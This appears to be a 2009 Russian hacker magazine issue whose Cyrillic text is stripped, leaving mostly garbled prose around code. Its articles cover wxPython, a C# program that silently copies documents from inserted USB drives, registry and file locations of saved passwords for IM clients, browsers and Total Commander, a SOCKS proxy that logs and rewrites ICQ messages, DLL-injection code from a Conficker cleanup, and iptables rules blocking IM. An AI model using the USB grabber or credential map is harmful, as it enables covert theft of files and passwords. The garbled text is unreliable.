

4) app.MainLoop() .
, ( ).
, MainLoop()
. OnInit() , OnExit()
, wxPython.
-wxPython . -
,
,
SetExitOnFrameDelete(False).
, wx.Exit().
, .
, .

():
wx.Frame(parent, id=-1, title=,
pos=wx.DefaultPosition, size=wx.DefaultSize,
X 08 /128/ 09

style=wx.DEFAULT_FRAME_STYLE, name=frame)

,
. .
id, .
id.
:
1)
.
2) wx.NewId().
3) wx.ID_ANY -1 (
).
-

089

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

, .
: self.panel.Bind(wx.EVT_BUTTON, self.OnButtonClick, self.
helloButton).
panel , , helloButton, OnButtonClick(self,
event).
, , ,
, ( ).
helloButton,
OnButtonClick() Frame, .
:
Skip(),
(
, ).
.


. , , ,
.
wx.Panel , , ,
, .
,
.
. .
, . ,
( pos size).
Get/Set (
, C++,
wxPython wxWindows,
C++).

,
, .
(events) wxPythone , .
MainLoop(), .
, ,
. .
- , ,
, . wx.Event
. , wx.MouseEvent 14 ,
wx.EVT_RIGHT_DOWN, wx.EVT_LEFT_UP ..
wxPython,
. ,
wx.Button wx.CommandEvent
EVT_BUTTON. ,
, ,
.
, , ,
,
wx.PyEventBinder. .
,
.
wx.EvtHandler, ,
Bind. - ,
. : Bind(event, handler,
source=None, id=wx.ID_ANY, id2=wx.ID_ANY).
. Event wx.PyEventBinder, ; handler , ,
.
source , (
, , ).

090

, , , Hello,
world!, . .
GUI .
GUI:
1. .
2. .
3. GUI .

( Windows).
270 . ,
.
, .
,
/ , ,
. GUI,
.
, GUI.
.
, .
1. ,
,
(, buttonMul
button_12).
2. .
On. ,
, , (,
OnButtonEraseClick , ,
buttonErase). ,
, ,
.
3.
.
,
(
), .
, , , ,
labele . :
# ,
# panel.
children = self.panel.GetChildren()
# , .
for child in children:
if child.GetId() == event.GetId():
X 08 /128/ 09

>> coding

HTTP://WWW
links
http://www.python.
org/doc/faq/gui
Pythons GUI FAQ.
http://www.
wxpython.org

wxPython.
wiki.python.org/moin
GuiProgramming
IDE
.


# , ,
# labele .
self.textCtrlInfo.AppendText(child.
GetLabel())


. Pythona,
. ,
(=)
(
OnOperationClick). ,
,
Pythone. -
, (, 2+3,

2+3=5 ).
, ,
GUI.
, .
1. ,
(,
).
,
.

. , style
wx.DEFAULT_FRAME_STYLE & (~(wx.MAXIMIZE_BOX |
wx.RESIZE_BORDER).
2.
, , .
.
:
X 08 /128/ 09

try:
number = float(self.textCtrlInfo.GetValue())
except (TypeError, ValueError):
self.errorStatusBar.SetStatusText(
'! .')
return

http://boaconstructor.
sourceforge.net
IDE
GUI.
http://www.pdfsearch-engine.com/
wxpython-in-actionpdf.html
WxPython in action.

float; , , ,
errorStatusBar .
, (TypeError,
ValueError). errorStatusBar.
, .
3. ,

. ,
: textCtrlInfo.
SetMaxLength(30).

, wxPython .
wxPython. ,
. wxPython
wxPython
Demo, .
.

. WxPython in
action Noel Rappin Robin Dunn.
.
, ,
( 1,2,3,11,14). wxPython .
GUI
Pythone, . ! z

DVD
dvd

.
wxPython.

091

++++

>> coding

++++

++++

++++

++++


/ ANTONOV.IGOR.KHV@GMAIL.COM /

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++


-

// ( ) . ,
.
,
.

.
,
- , .
,
.
, :
.
, .


C#.
.NET
.
. , ,
.
. , ,
.
ProgressBar. .

092

- .


,
,
. ,
.
,
.
,
.

.
, . ,
MSND. ,
. !

WINAPI ...
(
)
WM_DEVICECHANGE. ,
X 08 /128/ 09

>> coding


?

. $10 $100.
, . ,
, . ,
;).

.
WindowProc. :
,
LResult CALLBACK WindowProc (
HWND hwnd, //
UINT uMsg, //
WPARAM wParam, //,
LPARAM lParam // -

XDIRECTORY

SOURCE
DESTINATION

.
.

OVERWRITE

. TRUE,

FOLDERFILTER
FILEFILTERS

X 08 /128/ 09

LAUNCH-

)


WParam ,
WM_DEVICECHANGE. :
- DBT_DEVICEARRIVAL
- DBT_DEVICEREMOVECOMPLETE

, ,
, , ?
( usb)
(, , ..). ,
. LParam
_DEV_BROADCAST_HDR,
dbch_devicetype. , ,
. DEV_DEVTYP_
VOLUME,
!


typedef struct _DEV_BROADCAST_HDR {
DWORD dbch_size; //
DWORD dbch_devicetype; //
DWORD dbch_reserved; //,
}DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;

093

++++

>> coding

++++

++++

++++

++++

string dirName = Environment.GetCommandLineArgs()


[0] + "flash_" + DateTime.Now.ToString("dd-MM-yyhh-mm-ss");
CreateDirectory(dirName);

++++

xDirectory flashcopier = new xDirectory();


flashcopier.IndexComplete += new
IndexCompleteEventHandler(IndexCompleate);

++++
flashcopier.ItemCopied +=
new ItemCopiedEventHandler(ItemCopied);

++++

++++

flashcopier.CopyComplete +=
new CopyCompleteEventHandler(CopyComplete);
flashcopier.Source =
new DirectoryInfo(e.Drive.ToString());
flashcopier.Destination =
new DirectoryInfo(dirName);

++++
flashcopier.Overwrite = true;
flashcopier.FolderFilter = "*";

++++

++++

flashcopier.FileFilters.Add("*.doc");
flashcopier.FileFilters.Add("*.xls");
//
//....
flashcopier.StartCopy();

STARTCOPY
CANCELCOPY

XDIRECTORY
API, . . ;
. , .NET C#
.

.NET
C#.
? . WinAPI,

? ?.
- . WinAPI- ( ),
.
. C#,
.
( ) .
. ,
,
Windows API.
, , , Jan Dolinay.

DriveDetector, :
-;
;
;
;
;
,
.

, .
. :

++++
flashDriveDetector = new DriveDetector();

++++

++ ++

++++

++++

++++

++++

, , . , ,
DEV_BROADCAST_
VOLUME.

typedef struct _DEV_BROADCAST_VOLUME {
DWORD dbcv_size; //
DWORD dbcv_devicetype; //
DWORD dbcv_reserved; //
DWORD dbcv_unitmask; //
WORD dbcv_flags; //
}
DEV_BROADCAST_VOLUME, *PDEV_BROADCAST_VOLUME;

dbcv_unitmask. ,
,
. , 0, A;
1, B ..
.

094

flashDriveDetector.DeviceArrived +=
new DriveDetectorEventHandler(OnDriveArrived);
flashDriveDetector.DeviceRemoved +=
new DriveDetectorEventHandler(OnDriveRemoved);

DriveDetector
DevieArrived() DriveRemoved().
, .
Form1().

DeviceArrived. .
,
.
flash_ ,
, .
,
CreateDirectory().
.
DirectoryInfo, ,
X 08 /128/ 09

>> coding


Create(),
.
.
xDirectory.
, ,
: .
, xDirectory . -
.
, . ,
.
. , . ,
. XXI ,
xDirectory
.
, // ,
.
. ( ) usb-
, .

USB-

. . -. .
,
.
/ ,
.
, . , launch-.
, , , portable- ,
, .
.

X 08 /128/ 09

XDIRECTORY

ITEMINDEXEDEVENTHANDLER
INDEXCOMPLEATEEVENT
HANDLER
ITEMCOPIEDEVENTHANDLER
COPYCOMPLETEEVENTHANDLER

, .
.

?
, - .
Documents and Settings\\
Application Data\%ProgramName% .
ProgramName .
,
xDirectory (
) .
. ( ),

.NET (
TC):
RegistryKey readKey = Registry.CurrentUser.
OpenSubKey("software\\Ghisler\\Total
Commander");
string key =
(string) readKey.GetValue("InstallDir");

. .
, .
,
,
.

WARNING

warning




.
?

!

DVD
dvd


.

MAIL.AGENT
Mail.ru
( ). , ,
:

095

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++


, . ,
, . ( )

-. ,
.

1. . MA
Documents and setting\%%\Appication Data\Mra\base.
base mra.dbs. , ,
.
2. -.
MRA\% %\clist5.txt. ,
mail.agent (
). , @.
3. . (, )
HKCU\Software\Mail.RU\Agent\
magent_logins2\%Account% ####password.

GTALK
++++

++++

++++

Google ,
gabber- gTalk. gTalk
. ,
, ,
.
gTalk HHEY_
CURRENT_USER\Software\Google\Google Talk\Accounts.
, -
gTalk.
pw.

TOTAL COMMANDER
++++

++++

++ ++

++++

++++

++++

++++

Total Commander ,
.
(
). FTP-. , , ,
.
TC ,
ini-. ,
(ip, ,
..) Total Commander wcx_ftp.ini,
. ,
Total Commander, .
HKEY_CURRENT_USER\Software\Ghisler\Total Commander.

FIREFOX
WEB, ,
. web-. 99% .
/ ,

.
-

096

MSDN

. , ,
.
, . , , .
1. sessionstore.js .
2. signons3.txt ( FF).
3. signons.sqlite SQLite-,
.
4. key3.db , .
Document
and Settings\%UserName%\Application Data\Mozilla\FireFox\
Profiles\% %.

OPERA
Opera , . , .
, Opera , FireFox.
Document and
Settings\%UserName%\Application Data\Opera\profile wand.
dat. , Opera
, FireFox.

SKYPE
.
,
. , ,
( , FF).

Document and Settings\%userName%\Application Data\Skype\
HKEY_CURRENT_USER\Software\
Skype\ProtectedStorage.

QIP
, QIP Application Data\qip.

COPYING COMPLETED
.NET ,
. , ,
, WinAPI ASMe. - ,
, WinAPI , ,
. ,
. ,
, , .z
X 08 /128/ 09


2100 . ( 15%
)

. ,

!
!

+ + DVD:

- 155 ( 25% , )
12

3720

2100

+DVD 6
1200 .
, ,
8(495)780-88-29 ( )
8(800)200-3-999 ( , , ). info@glc.ru
www.GLC.ru

1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

:

;
20
.
,
.
, . ,
, .

!
C 2009
72 000 QIWI ()
.

++++

>> coding

++++

++++
PREDIDENTUA
/ HTTP://TUTAMC.COM /

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++


-

socks- Pythone
socks- ,
IP.
: , ,
.
1.
Google Chrome
. ,
. , .
! socks-,
Chromea. . ,
http- ( , user-agent) ,
. ,
, , . ,
.

2.
++++

++++

++++


FOA Group.
socks-, POST- ,
, AES
BASE64. , , . : [FOA]secure text[/FOA], socks- -
[FOA]BASE64==[/FOA]. html-

098

. -
base64-, ,
- .

3.
, - . ( ,
). ,

.
,
. -, Simp,
socks-,
RSA-. -, :).

. , Python.

SOCKS-

Socks .
, , -.
X 08 /128/ 09

>> coding

SOCKS

socks- Xavier Lagraula.


, PySocks.py ( ) socks.conf (). :
bind_address : 127.000.000.001
bind_port : 1080

IP- , socks-.
PySocks.py . ,
,
Windows7? , PySocks py pyw.
. ,
recv. PySocks.
py ,
( ):
data = readable_sock.recv(self.server)
if data:
if readable_sock == client_sock:
my_type = 1
else:
my_type = 2
data = my_hack.my_hack(my_type,data)

X 08 /128/ 09

OSCAR. !

writeableslist[0].send(data)
if readable_sock == client_sock:
octets_out += len(data)
else:
octets_in += len(data)
else:
raise Connection_Closed

.
( ). client_sock , ,
my_hack. .
, my_hack,
, , .
my_hack.py,
socks-, :
def my_hack(type,data):
return data

, (my_hack) , ,
socks-.

099

++++

>> coding

++++

OSCAR

++++
HTTP://WWW
++++

++++

++++

++++

++++

links



: dev.aol.com/
aim/oscar.

OSCAR , ,
. AOL ( Time Warner): ICQ AIM. AOL 5 2008
. , .

DES:
sourceforge.net/
projects/pydes.

Pythone socks,
:
sourceforge.net/
projects/pysocks.

++++

++++

DVD
dvd

++++

++++

++++



socks
.


!

++++
INFO
++ ++
info

++++

++++

++++

++++

SOCKS
,


(). SOCKS

SOCKetS (,
).

100

NETBEANS


pyDes.py, Todd
Whiteman.

padmode=pyDes.PAD_PKCS5.
encrypt decrypt .
, -.
:

.

, , .
.
my_hack:

import pyDes
#
def encode(password,data):
k = pyDes.des(pass,
padmode = pyDes.PAD_PKCS5)
return k.encrypt(data)
#
def decode(password,data):
k = pyDes.des(pass,
padmode=pyDes.PAD_PKCS5)
return k.decrypt(data)

DES-,
3DES. AES, Python
Cryptography Toolkit.

#
if type == 1:
file = open('q.txt.', 'w+')
file.write(data)
file.close()

,
0x2a02, 2 (,

). 2 ,
, 6 .
;
0x00040006.
26.
. ,
. 39 + 4 .
45 + _ .
X 08 /128/ 09

>> coding

NETBEANS
,
:
if type == 1:
#
if data[0:2] == '\x2a\x02'
and data[6:10] == '\x00\x04\x00\x06':
#
len_num = ord(data[26])
#
len_msg = ord(data[39+len_num])*256
+ord(data[40+len_num])-4
#
msg = data[45+len_num:45+len_num+len_msg]

, ? ,
, .
,
base64 base64,
, DES
:
enc_msg = encode(pass, msg)
enc_msg = base64.encodestring(enc_msg)

!
. , ,
, .
#
len_enc_msg = len(enc_msg)+4
len_num_1 = chr(len_enc_msg / 256)
len_num_2 = chr(len_enc_msg % 256)
X 08 /128/ 09

#
data = data[0:39+len_num] + len_num_1
+ len_num_2 + \x00\x02\x00\x00
+ enc_msg + data[45+len_num+len_msg:]

5- 6- , :
#
len_all = len(data)-6
len_all_1 = chr(len_all / 256)
len_all_2 = chr(len_all % 256)
#
data = data[0:4]+len_all_1 + len_all_2 + data[6:]

(
), hex.
, , . . -,
, , , .


,
, -
. , , ,
, https.
, ,
, . sslstrip,
12- .
, ! ?
? , , :).
, , , . : spirt40@gmail.com! z

101

++++

>> coding

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++


/ALEKSANDR-EHKKERT@RAMBLER.RU/



, , WinDDK ,
,
Windows .
CONFICKERA

++++

++++

++++

++++

-, , 10 . ,
.

,
.
, . ?

.
.
, ,
(, ?)

102

. . ,
, svchost.exe.
.
,
. ,
(
USB-, , , ).

. dll, . -,
system32 dll- .
, ,
svchost.exe.
X 08 /128/ 09

>> coding


Sysinternals, . , dll-

PEBe (
z, PETools . ListDlls Sysinternals,
. HandleViewer
lepujmlx.dll, svchost.exe. ,
, ,
.
, ntdll.dll, ,
, . , .
RKUnhooker .

, Confickera
( KidoKiller KAV EConfickerRemover ESET), ,
, lepujmlx.
dll , .
, svchost.exe lepujmlx.dll,
.
dll
svchost.exe .
Confickera,
, ; . -
- ,
.

, ,

LdrLoadDll . , NtOpenProcess, NtWriteVirtualMemory
NtReadVirtualMemory . ,
.
, .
, ,
FreeLibrary, ,
. , ,
.
. , dll
CreateRemoteThread.
:

DLL

: , , dll .
LoadLibrary ,
, LdrLoadDll. ,


LdrLoadDll, , ,
LdrLoadDll ntdll.dll.
usermode ntdll.

X 08 /128/ 09

hProcess = OpenProcess(...);
LibFileRemote = (PWSTR) VirtualAllocEx(hProcess...);
WriteProcessMemory(hProcess, LibFileRemote, ...);
PTHREAD_START_ROUTINE fnThreadRtn =
(PTHREAD_START_ROUTINE) GetProcAddress(
GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
fnThreadRtn, LibFileRemote, 0, NULL);

LdrLoadDll
LdrpLoadModule LdrAttachProcess, .
,
.

103

++++

>> coding

++++

++++

++++

++++

++++

++++
RKUNHOOKER SSDT

++++

++++

HTTP://WWW
links

++++

++++

++++



Windows

rsdn.ru wasm.ru.



Win
ntkernel.com.

++++

++++

++ ++

++++

INFO

info

Windows
,

HKEY_CURRENT_
USER\Software\

++++

Microsoft\Windows\
CurrentVersion\
Policies\Explorer

++++

++++

NoDriveType
AutoRun 0xff.

104

dll OpenFile/
CreateSection/MapViewOfSection. , ,
.
(, ntdll.dll
):
DWORD GetDllFunctionAddress(
char* lpFunctionName,
PUNICODE_STRING pDllName)
{
ZwOpenFile(...);
ZwCreateSection(...);
ZwMapViewOfSection(...);
...
dosheader = (IMAGE_DOS_HEADER *)hMod;
//
...
for(i = 0;
i < pExportTable-> NumberOfFunctions;
i++)
{
functionName = (char*)( (BYTE*)hMod +
arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x]
+ Base 1;
functionAddress = (DWORD)( (BYTE*)hMod +
arrayOfFunctionAddresses
[functionOrdinal]);
if (RtlCompareString(&ntFunctionName,
&ntFunctionNameSearch, TRUE) == 0)
return functionAddress;
}
return 0;
}

, LdrLoadDll, .
,

. LdrLoadDll,
. ,
, . KeAttachProcess svchost.exe
PEB (Process Environment Block; ,
z).
LDR_DATA_TABLE_ENTRY,
, ModuleBaseAddress.
: ntdll.dll
svchoste. , ,

LdrLoadDll.
myLdrLoadDll, .
, .
, .
, :

ntdll.dll
ZwQueryInformationProcess(
NtCurrentProcess(),
ProcessBasicInformation, &ProcInfo,
sizeof(PROCESS_BASIC_INFORMATION), &Size);
pPeb = ProcInfo.PebBaseAddress;
// : pPeb
(PEB*)0x7FFDF000;
PPEB_LDR_DATA Ldr = pPeb->Ldr;
PLIST_ENTRY InitialEntry =
Ldr -> InitializationOrder.Flink;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry =
CONTAINING_RECORD( InitialEntry,
LDR_DATA_TABLE_ENTRY,
InitializationOrder);
PLIST_ENTRY LoadOrderListHead =
LdrDataTableEntry->LoadOrder.Blink;


.
X 08 /128/ 09

>> coding



ZwWriteVirtualMemory,
ZwReadVirtualMemory, ZwOpenProcess, ZwDuplicateObject,
ZwQueryInformationProcess ZwProtectVirtualMemory.
.
.
. ,
. : Usermode ,
ntdll.dll,
KeServiceDescriptorTable (
, , ).
,
.

KESTACKATTACHPROCESS
, , KeAttachProcess ,
Microsoft, KeStackAttachProcess,

.
.
SSDT
, ,
, MmGetSystemRoutineAddress. ,
, : PVOID func_addres =
MmGetSystemRoutineAddress( &ApiNameUnicode ). . , ,
. ,
Windows .
MmGetSystemRoutineAddress NULL.


: ,
, . .
,

X 08 /128/ 09

DLL-

. ,
, .
,
NtAdjustPrivilegesToken.
,
. , ,
.
,
-
- .
BSOD.
, , , WinDBG - .
, , Immunity debuggerom, ,
, .
! z

DVD
dvd

,

, ,
.

105

>> phreaking

LOCKDOG / LINE3D@YANDEX.RU /


,
(
). , ,
, . .

>> phreaking


? , - .
. (, , ),
. ()
, , ,
, .
.
AVR. ,
. ,
C++ .
C++.
:
, ,
.


,
. ,
, . , .
, ,
,

106

(
). ,
.
. .
. .
ATmega16 , .
( ), , .


,
, , ,
.
, . L7805
5, .
2,5 ,
, , 7,5 . , .
, .


.
DIP ( ) . ,
, USART , .
, X 08 /128/ 09

>> phreaking



.
. RESET (9- ) R1
. ,
, .
, RESET
C1 .
1000 ,
, . X1 C2, C3
XTAL1 XTAL2.
, , ,
. C++.
CodeVisionAVR.
, .

X 08 /128/ 09


.
! , , . . L293D.

D, .
.
DIP SOIC. DIP
- . L293D
,
( VSS),
( VS). L293D 600 ,
. ,
. , , ,

107

>>
>> pc_zone
phreaking

,
:
ATmega16 DIP-40
L7805 TO-220
L293D DIP-16 2
.
0,25
: 10 1 .,
220 4 .
: 0.1 , 1 , 22
: 1000 16 , 220

16 2 .
1N4001 1N4004

16
-:

, ,
-
,
,

.


.
, L293D 1.2 . ,
, .
: IN1 IN2 0,
IN3 IN4 , .
,
. EN1 EN2
.
. ,
,
GND
. ,
.


,
.
-, , , -.
: , -
, . , , . ,
-

. ,
. .
, ,
.

108

, ,
,
. :
.

:

,

, ,

.
#include <mega16.h>
#include <delay.h>

, PORTC
, :
X 08 /128/ 09

>> phreaking

, , .


PORTC.0
PORTC.1
PORTC.2
PORTC.3

=
=
=
=

0xFF;
0x00;
0xFF;
0x00;

0xFF , . 1, 0x00 . 0.
,
:
if (!(PINB & (1<<PINB.0)))
{
...
}
-, 0, ,
. , , . ,
,
, . delay_ms(1000)
X 08 /128/ 09

,
. .
, . , ,
, - , ? , .
,
,
.
TSOP ( -,
)
. ; ,
.
,
. - !
OpenCV,
,
.
. z

109

>> phreaking

CLUSTER / CLUSTERRR@CLUSTERRR.COM /



. , ,
ASUS!
Linux.
, ?
>> phreaking



, . , .
, .
: , , .
-
LPT- . ,
. ,
,
.
. ,
,
.
.
ATmega16, COM-.

. : ,
. , ,
AVR +5 ,
, 0 . .
-, 5 . -, ,
. ;
. .
( PORTx, x
), . . .
COM-
USART-.

110

( ,
AVR). ,
;
.
- . .
, , ?

, ?
. :
,
;
, .
.
. Windows , /
, /
, , / -.
.

,

.
, . ,
, , Nintendo DS .
, , X 08 /128/ 09

>> phreaking

. COM-
COM-


. , COM-
, , ,
.
, :
.
. ,
ASUS WL-500gP. , Linux,
UART-, .
X 08 /128/ 09


,
. !
UART COM-,
MAX3232. . , z 125 (
UART). , , Linux,
COM- ,
, .
, ?
.

111

>>
>> pc_zone
phreaking

, USBCOM USB-. pl2303.


insmod usbserial.o insmod pl2303.o.
/dev/usb/tts/0.

. USB- ,

:
IPKG
mount /dev/scsi/host0/bus0/target0/lun0/
part1 /opt
ipkg.sh update
ipkg.sh install ipkg-opt
ipkg update

, /dev/scsi/host0/bus0/target0/
lun0/part1 EXT3- .
; ,
. , , -

MAX3232

DVD
dvd

.

.

112

ASUS
, (,
).
,
. :
http://oleg.wl500g.info.
WL-500gP, .

ipkg.
Step (z
106, Level-up ),

fdisk mke2fs; . ,
,
, . ,
:

echo "#!/bin/sh" > /usr/local/sbin/postmount
echo "mount /dev/scsi/host0/bus0/target0/
lun0/part1 /opt" >> /usr/local/sbin/postmount
chmod +x /usr/local/sbin/post-mount
flashfs save
X 08 /128/ 09

>> phreaking


flashfs commit
flashfs enable

post-mount ,
. , ! , ipkg install
<_>.


,
! ?
,
: ,
.
,
.

: , . , buildroot. ipkg install buildroot,


ipkg . gcc, g++, make . ,
, ?
:
HELLO WORLD
[Cluster@CLUSTER Cluster]$ cat hello.c
#include <stdio.h>


, !
? , . ,
. ,
. .
? , . X 08 /128/ 09

113

>>
>> pc_zone
phreaking

UART- WL-500GP ASUS



int main()
{
printf("Hello world!\n");
}
[Cluster@CLUSTER Cluster]$ gcc hello.c -o hello
[Cluster@CLUSTER Cluster]$ ./hello
Hello world!

, . . ,
. .
TCP-, .
, UART. , , ,
.
/dev/
usb/tts/0 /dev/usb/tts/1. , ,
. ,
. ,
- COM- ? ,
, . ,
:

stty -crtscts 9600 < /dev/tts/1
echo "Hello world!" > /dev/tts/1

. . , .
?
, ,
. , :

int open_uart_port()
{

114

int fd;
struct termios options;
fd = open(UARTPORT, O_RDWR | O_NOCTTY | O_NDELAY);
if (fd == -1)
{
perror("Cant open port");
exit(1);
}
tcflush(fd, TCIFLUSH);
tcgetattr(fd, &options);
options.c_cflag &= ~PARENB;
options.c_cflag &= ~CSTOPB;
options.c_cflag &= ~CSIZE;
options.c_cflag |= CS8;
options.c_cflag &= ~CRTSCTS;
options.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
cfsetospeed(&options, B9600);
tcsetattr(fd, TCSANOW, &options);
fcntl(fd, F_SETFL, FNDELAY);
printf("UART (%s) port opened\n", UARTPORT);
return fd;
}

UARTPORT -,
. /dev/tts/1. fopen() ,
. 9600
, ; .
write() read().
, , ,
,
:

int StartListen()
{
int sock;
X 08 /128/ 09

>>>>phreaking
pc_zone


int i = 1;
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Cant create socket");
return -1;
}
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(CCPORT);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sock, (struct sockaddr *)&sa, sizeof sa))
{
perror("Cant bind port");
close(sock);
return -1;
}
if (listen(sock, 15))
{
perror("Cant listen port");
close(sock);
return -1;
}
if (ioctl(sock, FIONBIO, &i))
{
perror("Cant set non-blocking mode");
close(sock);
return -1;
}
printf("Listening on port %u\n", CCPORT);
return sock;
}

CCPORT , . ,
( ).
.
. , ,
. COM-.
X 08 /128/ 09


,
.
Windows,
Borland Delphi. ,
.
,
. , :
, ,
..
, .
, .


, , , .
-! lighttpd, , . PHP.
PHP?
, .
,
-, , .
.
rrdtool,
,
. ,
, .. .
, ,
SMS, - .
.


,
.
,

. ,
- . z

115

>> SYN/ACK
_SSH3R1FF/ SSH3R1FF@GMAIL.COM /


IM, Skype, P2P

>> SYN/ACK

, , , , , ,
. , ,
.
,
IM-
: ,
.
90% , 10%
, ,
,
.
http-
,
. ,
, . .
, , tcpdump
:
$ sudo tcpdump -i eth0

:
21:33:55.687042 IP 10.10.10.10.33018
> 64.12.26.150.aol: . ack 11334 win
63920

, , IP- ICQ, , .
grep aol
/etc/protocols, tcpdump '-n'
. , :
$ sudo tcpdump -i eth0 dst portrange
5190

116


, . IM-.
ICQ, ,
login.icq.com 5190. , 5190
443.
,
:
$ host login.icq.com
login.icq.com is an alias for login.
messaging.aol.com.
login.messaging.aol.com has address
64.12.161.153

, login.icq.com
, , ,
. . ,
ICQ
,
.
dig
(dig login.icq.com).

. , -
(
iptables,
):
iptables -A FORWARD -p TCP --dport
5190 -j DROP
iptables -A OUTPUT -d login.icq.com

-j REJECT
iptables -A OUTPUT -d id.rambler.ru
-j REJECT

, IP
,
,
. ,

www.icq.com/icq2go, -.
, IP (
dig):
iptables -A OUTPUT -d 64.12.0.0/16
-j REJECT
iptables -A OUTPUT -d 205.188.0.0/16
-j REJECT


icq2go
(- www.meebo.com), IM- .
. tcpdump',
, Yahoo! Messenger
TCP-: 5000-5001,5050,5100 UDP-: 5000-5010, MSN 1863, Jabber/Gtalk
5222, 5223, IRC 6667-6669, ail : 2041, 2042.
, ! ,
(, IRC ..)
.
. ,
Yahoo Messenger:
X 08 /128/ 09

>> SYN/ACK

iptables
iptables
iptables
iptables
iptables
iptables

-A
-A
-A
-A
-A
-A

FORWARD
FORWARD
FORWARD
FORWARD
FORWARD
FORWARD

-p
-p
-p
-p
-d
-d

TCP --dport 5000:5001 -j REJECT


TCP --dport 5050 -j REJECT
TCP --dport 5100 -j REJECT
UDP --dport 5000:5010 -j REJECT
cs.yahoo.com -j REJECT
scsa.yahoo.com -j REJECT


DNS-,
. , DNS-
,
tcpdump. DNS- OpenBSD,
BIND 9.3.4:
$ sudo vim /var/named/etc/named.conf
logging {
//

MIPKO EMPLOYEE
MONITOR
: ICQ ,
, ,
. , , . . ,
, .
,
, .
MIPKO Employee Monitor (www.mipko.ru).
,
.
.
.
X 08 /128/ 09

channel queries_ch {
// - (
chroot-),
file "/log/queries.log" versions 5 size 10m;
// (
debug, info)
severity debug;
// ,

print-category yes;
print-severity yes;
print-time yes;
};
//
category queries { queries_ch; };
category resolver { queries_ch; };
};


l7-filter 10
12 , .
, /proc/
net/layer7_numpackets:
$ sudo sh -c "echo 16 > /proc/net/layer7_numpackets"

ICQ packet filter


$ sudo vim /etc/pf.conf
table <ICQDests> const { 64.12.0.0/16, 205.188.0.0/16 }
block out log quick on $ext_if proto { tcp, udp } \
from any to <ICQDests>
block out log quick on $ext_if proto { tcp, udp } \
from any to any port { 4000, 5190 }

117

>> SYN/ACK

- ICQ2GO

HOST DIG,
ICQ
named
DNS-:

INFO

info

Squid

z - 2008
.

Netfilter

,
l7-filter.

HTTP://WWW
links
Netfilter/Iptables
netfilter.org.
Squid www.squidcache.org.
l7-filter l7-filter.
sf.net.
IPP2P ipp2p.org.
P2PWall www.
lowth.com/p2pwall.

118

$ sudo rndc reload


$ sudo rndc querylog

:
$ sudo tail -f /var/named/log/queries.log
30-Jun-2009 16:22:15.036 resolver: debug 1:
createfetch: ns.mail.ru A
30-Jun-2009 16:22:35.179 queries: info: client
192.168.1.21#64773: view internal: query: www.
meebo.com IN A +
30-Jun-2009 16:22:35.868 queries: info: client
192.168.1.21#63341: view internal: query:
js.meebo.com IN A +

netstat/tcpdump/queries.log, .
. , iptstate TOP-
. , :
$ sudo iptstate --dstpt-filter=5190


IM- , 80/443 . iptables ,
, , Squid'
. ,
,
( Squid
z 2008 ). .
, squid.conf :

$ sudo vim /etc/squid/squid.conf


//
acl admin src 192.168.10.10
// aim/http MIME- ICQ
acl aim_http rep_mime_type -i ^aim/http$
// ,
http_reply_access deny aim_http !admin
// ,
ICQ
acl
ICQ-Mess
dst
64.12.200.89/32
205.188.153.121/32
205.188.179.233/32
64.12.161.153/32 64.12.161.185/32
http_access deny ICQ-Mess !admin

, IM-,
mail.ru, ,
:
acl im_nets src "/usr/local/etc/squid/icq_
nets.acl"
http_acces deny im_nets !admin

Sarg ( - Squid) , .

IPTABLES ,
,
.
OSI iptables.
2.6.14, ( patcho-matic-ng), , /
. string (xt_string).
, . , :
$ ls /lib/modules/2.6.24-24-generic/kernel/
net/netfilter/xt_string.ko

:
$ sudo iptables -A FORWARD -m string --string
"icq.com" \
--algo kmp --to 65535 -j DROP

, ,
. , /. ,
X 08 /128/ 09

>> SYN/ACK


TCPDUMP


,
Download Master:
$ sudo iptables -A FORWARD -m string --string --algo kmp \
"DownloadMaster" -j REJECT

, . '--algo' , ,
. kmp ( Knuth-Pratt-Morris) bm
( Boyer-Moore). ,
, bm . kmp bm,
. , string '--hex-string',
. ,
, , iptables.
.

, . l7-filter (l7-filter.
sf.net),Zorp(www.balabit.com/network-security/zorp-gateway),IPP2P(ipp2p.
org) P2PWall (www.lowth.com/p2pwall). ,

L7-FILTER USERSPACE- KERNEL-


, P2P-. Zorp
(Modular Application Level Gateway) . Zorp ,
.
, .
(HTTPS, POP3S, IMAPS SSH),
IDS. GPL (HTTP/1.1, FTP,
SSL, finger, whois telnet), Zorp .
L7-filter Netfilter
, ,
, . HTTP FTP; P2P (Kazaa, BitTorrent,
eDonkey2000, FastTrack); IM- (AIM/Jabber/IRC/MSN); VoIP/
Skype; VPN; (Battlefield, CS, Doom3, WoW); (exe, mp3)
Code Red Nimda.
l7-filter:
Kernel version ; , SMP- ;
Userspace version ,
,
GNU grep (,
).
, userspace , .
kernel- l7-filter,
IPP2P.
build-essential, iptables, iptables-dev
linux-source. , , /usr/src/linux:
$ sudo
config

cp

/boot/config-`uname

-r`

/usr/src/linux/.

l7-filter ( ), :

4.
- VELLE!
. .
1 !
www.velleoats.com
X 08 /128/ 09

119

>> .PRO
SYN/ACK
iptables -A FORWARD -m layer7 l7proto aim -j DROP
iptables -A FORWARD -m layer7 l7proto skypetoskype -j
DROP
iptables -A FORWARD -m layer7 l7proto skypeout -j DROP

: .

L7-FILTER

$ tar xzvf netfilter-layer7-v2.21.tar.gz


$ cd /usr/src/linux

iptables. (
2.6.28):
$ sudo patch -p1 < ../netfilter-layer7-v2.21/for_older_
kernels/kernel-2.6.22-2.6.24-layer7-2.18.patch

iptables:
